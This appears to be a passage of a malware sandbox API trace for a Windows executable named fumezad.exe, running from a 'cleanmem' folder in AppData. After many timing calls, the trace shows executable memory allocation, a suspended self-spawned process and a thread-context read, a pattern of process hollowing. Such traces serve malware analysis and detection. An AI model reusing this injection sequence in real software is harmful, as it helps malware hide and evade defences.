GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0110.532] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0xe53d7610, dwHighDateTime=0x1d4be3a)) [0127.662] SetProcessDEPPolicy (dwFlags=0x2) returned 0 [0127.664] GetProcAddress (hModule=0x76540000, lpProcName="VirtualAlloc") returned 0x76551856 [0127.664] VirtualAlloc (lpAddress=0x0, dwSize=0x3ba, flAllocationType=0x1000, flProtect=0x40) returned 0x1c0000 [0127.664] GetProcAddress (hModule=0x76540000, lpProcName="VirtualAlloc") returned 0x76551856 [0127.664] VirtualAlloc (lpAddress=0x0, dwSize=0x4470a, flAllocationType=0x1000, flProtect=0x40) returned 0x290000 [0127.672] GetProcAddress (hModule=0x76540000, lpProcName="VirtualAlloc") returned 0x76551856 [0127.672] GetProcAddress (hModule=0x76540000, lpProcName="ExitProcess") returned 0x76557a10 [0127.672] VirtualAlloc (lpAddress=0x0, dwSize=0x28e00, flAllocationType=0x1000, flProtect=0x40) returned 0x1c10000 [0127.675] VirtualAlloc (lpAddress=0x0, dwSize=0x1be0, flAllocationType=0x3000, flProtect=0x40) returned 0x1d0000 [0127.678] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x180e6c, nSize=0x103 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe")) returned 0x36 [0127.678] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" " [0127.678] CreateProcessW (in: lpApplicationName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe", lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x180e14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x181104 | out: lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe\" ", lpProcessInformation=0x181104*(hProcess=0x58, hThread=0x54, dwProcessId=0x844, dwThreadId=0x854)) returned 1 [0127.692] GetThreadContext (in: hThread=0x54, lpContext=0x180b24 | out: lpContext=0x180b24*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x40bb34, Ebp=0x0, Eip=0x777d01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, 